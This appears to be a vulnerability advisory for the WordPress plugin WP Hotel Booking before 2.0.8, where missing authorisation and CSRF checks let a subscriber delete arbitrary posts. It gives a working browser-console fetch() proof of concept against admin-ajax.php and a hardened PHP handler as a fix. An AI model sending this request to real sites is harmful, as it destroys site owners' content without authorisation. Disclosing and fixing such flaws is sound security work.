wpvulndb | Krzysztof Zając (CERT PL) | WPVDB-ID: A365C050-96AE-4266-AA87-850EE259EE2C
History: Oct 26, 2023 - 12:00 a.m.

WP Hotel Booking < 2.0.8 - Subscriber+ Arbitrary Post Deletion

2023-10-26 00:00:00
Krzysztof Zając (CERT PL)
wpscan.com
9
hotel booking
arbitrary deletion
csrf checks
wordpress

AI Score

7.1

Confidence

High

EPSS

0

Percentile

13.3%

Description

The plugin does not have authorisation and CSRF checks, and does not ensure that the package to be deleted is actually a package, allowing any authenticated user, such as a subscriber, to delete arbitrary posts.

PoC

Run the command below in the developer console of the web browser while logged in to the blog as a subscriber user. This will put the post with ID 1 in the trash. Run it again to then delete the post.

fetch("/wp-admin/admin-ajax.php", {
  "headers": {"content-type": "application/x-www-form-urlencoded; charset=UTF-8"},
  "body": "action=tp_extra_package_remove&package_id=1",
  "method": "POST"
});
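As an added illustration (not the plugin's own code and not part of the wpscan advisory), this is what a server-side handler for the same admin-ajax action looks like with the three missing controls in place: a nonce check against CSRF, a post-type check so only packages can be targeted, and a per-post capability check for authorisation. The action name and the package_id parameter come from the advisory; the post type name, nonce name and function name are assumptions.

```php
<?php
// Hardened handler for the admin-ajax action from the PoC. Example code,
// not the plugin's implementation. 'tp_extra_package_remove' and 'package_id'
// are from the advisory; 'hb_package' (post type), the nonce name and the
// function name are assumed for this example.

// Only the authenticated hook is registered: no wp_ajax_nopriv_ variant.
add_action( 'wp_ajax_tp_extra_package_remove', 'example_package_remove' );

function example_package_remove() {
    // 1. CSRF: require a nonce minted for this action and this user.
    //    The client obtains it with wp_create_nonce('tp_extra_package_remove')
    //    and sends it as the 'nonce' POST field; on failure this dies with -1.
    check_ajax_referer( 'tp_extra_package_remove', 'nonce' );

    $package_id = isset( $_POST['package_id'] ) ? absint( $_POST['package_id'] ) : 0;
    if ( ! $package_id ) {
        wp_send_json_error( array( 'message' => 'Missing package_id' ), 400 );
    }

    // 2. Type check: the ID must refer to a package, not an arbitrary post.
    $post = get_post( $package_id );
    if ( ! $post || 'hb_package' !== $post->post_type ) {
        wp_send_json_error( array( 'message' => 'Not a package' ), 404 );
    }

    // 3. Authorisation: 'delete_post' is a meta capability resolved per post,
    //    so a subscriber, or an author who does not own the post, is rejected.
    if ( ! current_user_can( 'delete_post', $package_id ) ) {
        wp_send_json_error( array( 'message' => 'Forbidden' ), 403 );
    }

    // Trash rather than permanently delete; a separate, equally guarded
    // action should be required for permanent deletion.
    if ( ! wp_trash_post( $package_id ) ) {
        wp_send_json_error( array( 'message' => 'Trash failed' ), 500 );
    }
    wp_send_json_success( array( 'id' => $package_id ) );
}
```

With these checks, the request in the PoC is rejected at the nonce check before any post lookup happens, and a forged request carrying a valid nonce still fails the type and capability checks.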
